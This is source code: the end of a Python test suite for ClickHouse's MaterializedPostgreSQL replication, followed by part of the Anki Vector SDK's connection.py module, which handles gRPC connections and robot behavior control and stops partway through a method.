cursor_.execute(query.format(thread_id)) print('thread {}, query {}'.format(thread_id, query)) if thread_id % 2 == 0: conn.commit() threads = [] threads_num = 6 for i in range(threads_num): threads.append(threading.Thread(target=transaction, args=(i,))) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for thread in threads: time.sleep(random.uniform(0, 0.5)) thread.start() # Join here because it takes time for data to reach wal for thread in threads: thread.join() time.sleep(1) started_cluster.pause_container('postgres1') for i in range(NUM_TABLES): result = instance.query("SELECT count() FROM test_database.postgresql_replica_{}".format(i)) print(result) # Just debug started_cluster.unpause_container('postgres1') for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): result = instance.query("SELECT count() FROM test_database.postgresql_replica_{}".format(i)) print(result) # Just debug drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_drop_database_while_replication_startup_not_finished(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) create_postgres_table(cursor, table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(100000)".format(table_name)) for i in range(6): create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) time.sleep(0.5 * i) drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_restart_server_while_replication_startup_not_finished(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) create_postgres_table(cursor, table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(100000)".format(table_name)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) time.sleep(0.5) instance.restart_clickhouse() for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table postgresql_replica_{};'.format(i)) def test_abrupt_server_restart_while_heavy_replication(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 6 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); def transaction(thread_id): if thread_id % 2: conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=True) else: conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=False) cursor_ = conn.cursor() for query in queries: cursor_.execute(query.format(thread_id)) print('thread {}, query {}'.format(thread_id, query)) if thread_id % 2 == 0: conn.commit() threads = [] threads_num = 6 for i in range(threads_num): threads.append(threading.Thread(target=transaction, args=(i,))) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for thread in threads: time.sleep(random.uniform(0, 0.5)) thread.start() # Join here because it takes time for data to reach wal for thread in threads: thread.join() instance.restart_clickhouse() for i in range(NUM_TABLES): result = instance.query("SELECT count() FROM test_database.postgresql_replica_{}".format(i)) print(result) # Just debug for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): result = instance.query("SELECT count() FROM test_database.postgresql_replica_{}".format(i)) print(result) # Just debug drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_quoting(started_cluster): table_name = 'user' conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() create_postgres_table(cursor, table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(50)".format(table_name)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) check_tables_are_synchronized(table_name); drop_postgres_table(cursor, table_name) drop_materialized_db() def test_user_managed_slots(started_cluster): conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() table_name = 'test_table' create_postgres_table(cursor, table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000)".format(table_name)) slot_name = 'user_slot' replication_connection = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, replication=True, auto_commit=True) snapshot = create_replication_slot(replication_connection, slot_name=slot_name) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, settings=["materialized_postgresql_replication_slot = '{}'".format(slot_name), "materialized_postgresql_snapshot = '{}'".format(snapshot)]) check_tables_are_synchronized(table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000, 10000)".format(table_name)) check_tables_are_synchronized(table_name); instance.restart_clickhouse() instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(20000, 10000)".format(table_name)) check_tables_are_synchronized(table_name); drop_postgres_table(cursor, table_name) drop_materialized_db() drop_replication_slot(replication_connection, slot_name) def test_add_new_table_to_replication(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, {} from numbers(10000)".format(i, i)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); result = instance.query("SHOW TABLES FROM test_database") assert(result == "postgresql_replica_0\npostgresql_replica_1\npostgresql_replica_2\npostgresql_replica_3\npostgresql_replica_4\n") table_name = 'postgresql_replica_5' create_postgres_table(cursor, table_name) instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000)".format(table_name)) result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") # Check without ip assert(result[-59:] == "\\'postgres_database\\', \\'postgres\\', \\'mysecretpassword\\')\n") result = instance.query_and_get_error("ALTER DATABASE test_database MODIFY SETTING materialized_postgresql_tables_list='tabl1'") assert('Changing setting `materialized_postgresql_tables_list` is not allowed' in result) result = instance.query_and_get_error("ALTER DATABASE test_database MODIFY SETTING materialized_postgresql_tables='tabl1'") assert('Database engine MaterializedPostgreSQL does not support setting' in result) instance.query("ATTACH TABLE test_database.{}".format(table_name)); result = instance.query("SHOW TABLES FROM test_database") assert(result == "postgresql_replica_0\npostgresql_replica_1\npostgresql_replica_2\npostgresql_replica_3\npostgresql_replica_4\npostgresql_replica_5\n") check_tables_are_synchronized(table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000, 10000)".format(table_name)) check_tables_are_synchronized(table_name); result = instance.query_and_get_error("ATTACH TABLE test_database.{}".format(table_name)); assert('Table test_database.postgresql_replica_5 already exists' in result) result = instance.query_and_get_error("ATTACH TABLE test_database.unknown_table"); assert('PostgreSQL table unknown_table does not exist' in result) result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-180:] == ")\\nSETTINGS materialized_postgresql_tables_list = \\'postgresql_replica_0,postgresql_replica_1,postgresql_replica_2,postgresql_replica_3,postgresql_replica_4,postgresql_replica_5\\'\n") table_name = 'postgresql_replica_6' create_postgres_table(cursor, table_name) instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000)".format(table_name)) instance.query("ATTACH TABLE test_database.{}".format(table_name)); instance.restart_clickhouse() table_name = 'postgresql_replica_7' create_postgres_table(cursor, table_name) instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(10000)".format(table_name)) instance.query("ATTACH TABLE test_database.{}".format(table_name)); result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-222:] == ")\\nSETTINGS materialized_postgresql_tables_list = \\'postgresql_replica_0,postgresql_replica_1,postgresql_replica_2,postgresql_replica_3,postgresql_replica_4,postgresql_replica_5,postgresql_replica_6,postgresql_replica_7\\'\n") result = instance.query("SHOW TABLES FROM test_database") assert(result == "postgresql_replica_0\npostgresql_replica_1\npostgresql_replica_2\npostgresql_replica_3\npostgresql_replica_4\npostgresql_replica_5\npostgresql_replica_6\npostgresql_replica_7\n") for i in range(NUM_TABLES + 3): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); for i in range(NUM_TABLES + 3): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_remove_table_from_replication(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, {} from numbers(10000)".format(i, i)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); result = instance.query("SHOW TABLES FROM test_database") assert(result == "postgresql_replica_0\npostgresql_replica_1\npostgresql_replica_2\npostgresql_replica_3\npostgresql_replica_4\n") result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-59:] == "\\'postgres_database\\', \\'postgres\\', \\'mysecretpassword\\')\n") table_name = 'postgresql_replica_4' instance.query('DETACH TABLE test_database.{}'.format(table_name)); result = instance.query_and_get_error('SELECT * FROM test_database.{}'.format(table_name)) assert("doesn't exist" in result) result = instance.query("SHOW TABLES FROM test_database") assert(result == "postgresql_replica_0\npostgresql_replica_1\npostgresql_replica_2\npostgresql_replica_3\n") result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-138:] == ")\\nSETTINGS materialized_postgresql_tables_list = \\'postgresql_replica_0,postgresql_replica_1,postgresql_replica_2,postgresql_replica_3\\'\n") instance.query('ATTACH TABLE test_database.{}'.format(table_name)); check_tables_are_synchronized(table_name); for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-159:] == ")\\nSETTINGS materialized_postgresql_tables_list = \\'postgresql_replica_0,postgresql_replica_1,postgresql_replica_2,postgresql_replica_3,postgresql_replica_4\\'\n") table_name = 'postgresql_replica_1' instance.query('DETACH TABLE test_database.{}'.format(table_name)); result = instance.query('SHOW CREATE DATABASE test_database') assert(result[:63] == "CREATE DATABASE test_database\\nENGINE = MaterializedPostgreSQL(") assert(result[-138:] == ")\\nSETTINGS materialized_postgresql_tables_list = \\'postgresql_replica_0,postgresql_replica_2,postgresql_replica_3,postgresql_replica_4\\'\n") for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) if __name__ == '__main__': cluster.start() input("Cluster created, press any key to destroy...") cluster.shutdown()
connection.py
# Copyright (c) 2018 Anki, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License in the file LICENSE.txt or at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Management of the connection to and from Vector. """ # __all__ should order by constants, event classes, other classes, functions. __all__ = ['ControlPriorityLevel', 'Connection', 'on_connection_thread'] import asyncio from concurrent import futures from enum import Enum import functools import inspect import logging import platform import sys import threading from typing import Any, Awaitable, Callable, Coroutine, Dict, List from google.protobuf.text_format import MessageToString import grpc import aiogrpc from . import util from .escapepod import EscapePod from .exceptions import (connection_error, VectorAsyncException, VectorBehaviorControlException, VectorConfigurationException, VectorControlException, VectorControlTimeoutException, VectorInvalidVersionException, VectorNotFoundException) from .messaging import client, protocol from .version import __version__ class CancelType(Enum): """Enum used to specify cancellation options for behaviors -- internal use only """ #: Cancellable as an 'Action' CANCELLABLE_ACTION = 0 #: Cancellable as a 'Behavior' CANCELLABLE_BEHAVIOR = 1 class ControlPriorityLevel(Enum): """Enum used to specify the priority level for the program.""" #: Runs above mandatory physical reactions, will drive off table, perform while on a slope, #: ignore low battery state, work in the dark, etc. OVERRIDE_BEHAVIORS_PRIORITY = protocol.ControlRequest.OVERRIDE_BEHAVIORS # pylint: disable=no-member #: Runs below Mandatory Physical Reactions such as tucking Vector's head and arms during a fall, #: yet above Trigger-Word Detection. Default for normal operation. DEFAULT_PRIORITY = protocol.ControlRequest.DEFAULT # pylint: disable=no-member #: Holds control of robot before/after other SDK connections #: Used to disable idle behaviors. Not to be used for regular behavior control. RESERVE_CONTROL = protocol.ControlRequest.RESERVE_CONTROL # pylint: disable=no-member class _ControlEventManager: """This manages every :class:`asyncio.Event` that handles the behavior control system. These include three events: granted, lost, and request. :class:`granted_event` represents the behavior system handing control to the SDK. :class:`lost_event` represents a higher priority behavior taking control away from the SDK. :class:`request_event` Is a way of alerting :class:`Connection` to request control. """ def __init__(self, loop: asyncio.BaseEventLoop = None, priority: ControlPriorityLevel = None): self._granted_event = asyncio.Event(loop=loop) self._lost_event = asyncio.Event(loop=loop) self._request_event = asyncio.Event(loop=loop) self._has_control = False self._priority = priority self._is_shutdown = False @property def granted_event(self) -> asyncio.Event: """This event is used to notify listeners that control has been granted to the SDK.""" return self._granted_event @property def lost_event(self) -> asyncio.Event: """Represents a higher priority behavior taking control away from the SDK.""" return self._lost_event @property def request_event(self) -> asyncio.Event: """Used to alert :class:`Connection` to request control.""" return self._request_event @property def has_control(self) -> bool: """Check to see that the behavior system has control (without blocking by checking :class:`granted_event`)""" return self._has_control @property def priority(self) -> ControlPriorityLevel: """The currently desired priority for the SDK.""" return self._priority @property def is_shutdown(self) -> bool: """Detect if the behavior control stream is supposed to shut down.""" return self._is_shutdown def request(self, priority: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY) -> None: """Tell the behavior stream to request control via setting the :class:`request_event`. This will signal Connection's :func:`_request_handler` generator to send a request control message on the BehaviorControl stream. This signal happens asynchronously, and can be tracked using the :class:`granted_event` parameter. :param priority: The level of control in the behavior system. This determines which actions are allowed to interrupt the SDK execution. See :class:`ControlPriorityLevel` for more information. """ if priority is None: raise VectorBehaviorControlException("Must provide a priority level to request. To disable control, use {}.release().", self.__class__.__name__) self._priority = priority self._request_event.set() def release(self) -> None: """Tell the behavior stream to release control via setting the :class:`request_event` while priority is ``None``. This will signal Connection's :func:`_request_handler` generator to send a release control message on the BehaviorControl stream. This signal happens asynchronously, and can be tracked using the :class:`lost_event` parameter. """ self._priority = None self._request_event.set() def update(self, enabled: bool) -> None: """Update the current state of control (either enabled or disabled) :param enabled: Used to enable/disable behavior control """ self._has_control = enabled if enabled: self._granted_event.set() self._lost_event.clear() else: self._lost_event.set() self._granted_event.clear() def shutdown(self) -> None: """Tells the control stream to shut down. This will return control to the rest of the behavior system. """ self._has_control = False self._granted_event.set() self._lost_event.set() self._is_shutdown = True self._request_event.set() class Connection: """Creates and maintains a aiogrpc connection including managing the connection thread. The connection thread decouples the actual messaging layer from the user's main thread, and requires any network requests to be ran using :func:`asyncio.run_coroutine_threadsafe` to make them run on the other thread. Connection provides two helper functions for running a function on the connection thread: :func:`~Connection.run_coroutine` and :func:`~Connection.run_soon`. This class may be used to bypass the structures of the python sdk handled by :class:`~anki_vector.robot.Robot`, and instead talk to aiogrpc more directly. The values for the cert_file location and the guid can be found in your home directory in the sdk_config.ini file. .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() :param name: Vector's name in the format of "Vector-XXXX". :param host: The IP address and port of Vector in the format "XX.XX.XX.XX:443". :param cert_file: The location of the certificate file on disk. :param guid: Your robot's unique secret key. :param behavior_control_level: pass one of :class:`ControlPriorityLevel` priority levels if the connection requires behavior control, or None to decline control. """ def __init__(self, name: str, host: str, cert_file: str, guid: str, escape_pod: bool = False, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY): self._loop: asyncio.BaseEventLoop = None self.name = name self.host = host self.cert_file = cert_file self._escape_pod = escape_pod self._interface = None self._channel = None self._has_control = False self._logger = util.get_class_logger(__name__, self) self._control_stream_task = None self._control_events: _ControlEventManager = None self._guid = guid self._thread: threading.Thread = None self._ready_signal: threading.Event = threading.Event() self._done_signal: asyncio.Event = None self._conn_exception = False self._behavior_control_level = behavior_control_level self.active_commands = [] @property def loop(self) -> asyncio.BaseEventLoop: """A direct reference to the loop on the connection thread. Can be used to run functions in on thread. .. testcode:: import anki_vector import asyncio async def connection_function(): print("I'm running in the connection thread event loop.") with anki_vector.Robot() as robot: asyncio.run_coroutine_threadsafe(connection_function(), robot.conn.loop) :returns: The loop running inside the connection thread """ if self._loop is None: raise VectorAsyncException("Attempted to access the connection loop before it was ready") return self._loop @property def thread(self) -> threading.Thread: """A direct reference to the connection thread. Available to callers to determine if the current thread is the connection thread. .. testcode:: import anki_vector import threading with anki_vector.Robot() as robot: if threading.current_thread() is robot.conn.thread: print("This code is running on the connection thread") else: print("This code is not running on the connection thread") :returns: The connection thread where all of the grpc messages are being processed. """ if self._thread is None: raise VectorAsyncException("Attempted to access the connection loop before it was ready") return self._thread @property def grpc_interface(self) -> client.ExternalInterfaceStub: """A direct reference to the connected aiogrpc interface. This may be used to directly call grpc messages bypassing :class:`anki_vector.Robot` .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() """ return self._interface @property def behavior_control_level(self) -> ControlPriorityLevel: """Returns the specific :class:`ControlPriorityLevel` requested for behavior control. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This property identifies the enumerated level of behavior control that the SDK will maintain over the robot. For more information about behavior control, see :ref:`behavior <behavior>`. .. code-block:: python import anki_vector with anki_vector.Robot() as robot: print(robot.conn.behavior_control_level) # Will print ControlPriorityLevel.DEFAULT_PRIORITY robot.conn.release_control() print(robot.conn.behavior_control_level) # Will print None """ return self._behavior_control_level @property def requires_behavior_control(self) -> bool: """True if the :class:`Connection` requires behavior control. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This boolean signifies that the :class:`Connection` will try to maintain control of Vector's behavior system even after losing control to higher priority robot behaviors such as returning home to charge a low battery. For more information about behavior control, see :ref:`behavior <behavior>`. .. code-block:: python import time import anki_vector def callback(robot, event_type, event): robot.conn.request_control() print(robot.conn.requires_behavior_control) # Will print True robot.anim.play_animation_trigger('GreetAfterLongTime') robot.conn.release_control() with anki_vector.Robot(behavior_control_level=None) as robot: print(robot.conn.requires_behavior_control) # Will print False robot.events.subscribe(callback, anki_vector.events.Events.robot_observed_face) # Waits 10 seconds. Show Vector your face. time.sleep(10) """ return self._behavior_control_level is not None @property def control_lost_event(self) -> asyncio.Event: """This provides an :class:`asyncio.Event` that a user may :func:`wait()` upon to detect when Vector has taken control of the behavior system at a higher priority. .. testcode:: import anki_vector async def auto_reconnect(conn: anki_vector.connection.Connection): await conn.control_lost_event.wait() conn.request_control() """ return self._control_events.lost_event @property def control_granted_event(self) -> asyncio.Event: """This provides an :class:`asyncio.Event` that a user may :func:`wait()` upon to detect when Vector has given control of the behavior system to the SDK program. .. testcode:: import anki_vector async def wait_for_control(conn: anki_vector.connection.Connection): await conn.control_granted_event.wait() # Run commands that require behavior control """ return self._control_events.granted_event def request_control(self, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY, timeout: float = 10.0): """Explicitly request behavior control. Typically used after detecting :func:`control_lost_event`. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This function will acquire control of Vector's behavior system. This will raise a :class:`VectorControlTimeoutException` if it fails to gain control before the timeout. For more information about behavior control, see :ref:`behavior <behavior>` .. testcode:: import anki_vector async def auto_reconnect(conn: anki_vector.connection.Connection): await conn.control_lost_event.wait() conn.request_control(timeout=5.0) :param timeout: The time allotted to attempt a connection, in seconds. :param behavior_control_level: request control of Vector's behavior system at a specific level of control. See :class:`ControlPriorityLevel` for more information. """ if not isinstance(behavior_control_level, ControlPriorityLevel): raise TypeError("behavior_control_level must be of type ControlPriorityLevel") if self._thread is threading.current_thread(): return asyncio.ensure_future(self._request_control(behavior_control_level=behavior_control_level, timeout=timeout), loop=self._loop) return self.run_coroutine(self._request_control(behavior_control_level=behavior_control_level, timeout=timeout)) async def _request_control(self, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY, timeout: float = 10.0): self._behavior_control_level = behavior_control_level self._control_events.request(self._behavior_control_level) try: self._has_control = await asyncio.wait_for(self.control_granted_event.wait(), timeout) except futures.TimeoutError as e: raise VectorControlTimeoutException(f"Surpassed timeout of {timeout}s") from e def release_control(self, timeout: float = 10.0): """Explicitly release control. Typically used after detecting :func:`control_lost_event`. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This function will release control of Vector's behavior system. This will raise a :class:`VectorControlTimeoutException` if it fails to receive a control_lost event before the timeout. .. testcode:: import anki_vector async def wait_for_control(conn: anki_vector.connection.Connection): await conn.control_granted_event.wait() # Run commands that require behavior control conn.release_control() :param timeout: The time allotted to attempt to release control, in seconds. """ if self._thread is threading.current_thread(): return asyncio.ensure_future(self._release_control(timeout=timeout), loop=self._loop) return self.run_coroutine(self._release_control(timeout=timeout)) async def _release_control(self, timeout: float = 10.0): self._behavior_control_level = None self._control_events.release() try: self._has_control = await asyncio.wait_for(self.control_lost_event.wait(), timeout) except futures.TimeoutError as e: raise VectorControlTimeoutException(f"Surpassed timeout of {timeout}s") from e def connect(self, timeout: float = 10.0) -> None: """Connect to Vector. This will start the connection thread which handles all messages between Vector and Python. .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() :param timeout: The time allotted to attempt a connection, in seconds. """ if self._thread: raise VectorAsyncException("\n\nRepeated connections made to open Connection.") self._ready_signal.clear() self._thread = threading.Thread(target=self._connect, args=(timeout,), daemon=True, name="gRPC Connection Handler Thread") self._thread.start() ready = self._ready_signal.wait(timeout=4 * timeout) if not ready: raise VectorNotFoundException() if hasattr(self._ready_signal, "exception"): e = getattr(self._ready_signal, "exception") delattr(self._ready_signal, "exception") raise e def _connect(self, timeout: float) -> None: """The function that runs on the connection thread. This will connect to Vector, and establish the BehaviorControl stream. """ try: if threading.main_thread() is threading.current_thread(): raise VectorAsyncException("\n\nConnection._connect must be run outside of the main thread.") self._loop = asyncio.new_event_loop() asyncio.set_event_loop(self._loop) self._done_signal = asyncio.Event() if not self._behavior_control_level: self._control_events = _ControlEventManager(self._loop) else: self._control_events = _ControlEventManager(self._loop, priority=self._behavior_control_level) trusted_certs = None if not self.cert_file is None: with open(self.cert_file, 'rb') as cert: trusted_certs = cert.read() else: if not self._escape_pod: raise VectorConfigurationException("Must provide a cert file to authenticate to Vector.") if self._escape_pod: if not EscapePod.validate_certificate_name(self.cert_file, self.name): trusted_certs = EscapePod.get_authentication_certificate(self.host) self.name = EscapePod.get_certificate_name(trusted_certs) self._guid = EscapePod.authenticate_escape_pod(self.host, self.name, trusted_certs) # Pin the robot certificate for opening the channel channel_credentials = aiogrpc.ssl_channel_credentials(root_certificates=trusted_certs) # Add authorization header for all the calls call_credentials = aiogrpc.access_token_call_credentials(self._guid) credentials = aiogrpc.composite_channel_credentials(channel_credentials, call_credentials) self._logger.info(f"Connecting to {self.host} for {self.name} using {self.cert_file}") self._channel = aiogrpc.secure_channel(self.host, credentials, options=(("grpc.ssl_target_name_override", self.name,),)) # Verify the connection to Vector is able to be established (client-side) try: # Explicitly grab _channel._channel to test the underlying grpc channel directly grpc.channel_ready_future(self._channel._channel).result(timeout=timeout) # pylint: disable=protected-access except grpc.FutureTimeoutError as e: raise VectorNotFoundException() from e self._interface = client.ExternalInterfaceStub(self._channel) # Verify Vector and the SDK have compatible protocol versions version = protocol.ProtocolVersionRequest(client_version=protocol.PROTOCOL_VERSION_CURRENT, min_host_version=protocol.PROTOCOL_VERSION_MINIMUM) protocol_version = self._loop.run_until_complete(self._interface.ProtocolVersion(version)) if protocol_version.result != protocol.ProtocolVersionResponse.SUCCESS or protocol.PROTOCOL_VERSION_MINIMUM > protocol_version.host_version: # pylint: disable=no-member raise VectorInvalidVersionException(protocol_version) self._control_stream_task = self._loop.create_task(self._open_connections()) # Initialze SDK sdk_module_version = __version__ python_version = platform.python_version() python_implementation = platform.python_implementation() os_version = platform.platform() cpu_version = platform.machine() initialize = protocol.SDKInitializationRequest(sdk_module_version=sdk_module_version, python_version=python_version, python_implementation=python_implementation, os_version=os_version, cpu_version=cpu_version) self._loop.run_until_complete(self._interface.SDKInitialization(initialize)) if self._behavior_control_level: self._loop.run_until_complete(self._request_control(behavior_control_level=self._behavior_control_level, timeout=timeout)) except grpc.RpcError as rpc_error: # pylint: disable=broad-except setattr(self._ready_signal, "exception", connection_error(rpc_error)) self._loop.close() return except Exception as e: # pylint: disable=broad-except # Propagate the errors to the calling thread setattr(self._ready_signal, "exception", e) self._loop.close() return finally: self._ready_signal.set() try: async def wait_until_done(): return await self._done_signal.wait() self._loop.run_until_complete(wait_until_done()) finally: self._loop.close() async def _request_handler(self): """Handles generating messages for the BehaviorControl stream.""" while await self._control_events.request_event.wait(): self._control_events.request_event.clear() if self._control_events.is_shutdown: return priority = self._control_events.priority if priority is None: msg = protocol.ControlRelease() msg = protocol.BehaviorControlRequest(control_release=msg) else: msg = protocol.ControlRequest(priority=priority.value) msg = protocol.BehaviorControlRequest(control_request=msg) self._logger.debug(f"BehaviorControl {MessageToString(msg, as_one_line=True)}") yield msg async def _open_connections(self): """Starts the BehaviorControl stream, and handles the messages coming back from the robot.""" try: async for response in self._interface.BehaviorControl(self._request_handler()): response_type = response.WhichOneof("response_type") if response_type == 'control_granted_response': self._logger.info(f"BehaviorControl {MessageToString(response, as_one_line=True)}") self._control_events.update(True) elif response_type == 'control_lost_event': self._cancel_active() self._logger.info(f"BehaviorControl {MessageToString(response, as_one_line=True)}") self._control_events.update(False) except futures.CancelledError: self._logger.debug('Behavior handler task was cancelled. This is expected during disconnection.') def _cancel_active(self): for fut in self.active_commands: if not fut.done(): fut.cancel() self.active_commands = [] def close(self): """Cleanup the connection, and shutdown all the event handlers. Usually this should be invoked by the Robot class when it closes. .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() """ try: if self._control_events: self._control_events.shutdown() if self._control_stream_task: self._control_stream_task.cancel() self.run_coroutine(self._control_stream_task).result() self._cancel_active() if self._channel: self.run_coroutine(self._channel.close()).result() self.run_coroutine(self._done_signal.set) self._thread.join(timeout=5) except: pass finally: self._thread = None def run_soon(self, coro: Awaitable) -> None: """Schedules the given awaitable to run on the event loop for the connection thread. .. testcode:: import anki_vector import time async def my_coroutine(): print("Running on the connection thread") with anki_vector.Robot() as robot: robot.conn.run_soon(my_coroutine()) time.sleep(1) :param coro: The coroutine, task or any awaitable to schedule for execution on the connection thread. """ if coro is None or not inspect.isawaitable(coro): raise VectorAsyncException(f"\n\n{coro.__name__ if hasattr(coro, '__name__') else coro} is not awaitable, so cannot be ran with run_soon.\n") def soon(): try: asyncio.ensure_future(coro) except TypeError as e: raise VectorAsyncException(f"\n\n{coro.__name__ if hasattr(coro, '__name__') else coro} could not be ensured as a future.\n") from e if threading.current_thread() is self._thread: self._loop.call_soon(soon) else: self._loop.call_soon_threadsafe(soon) def run_coroutine(self, 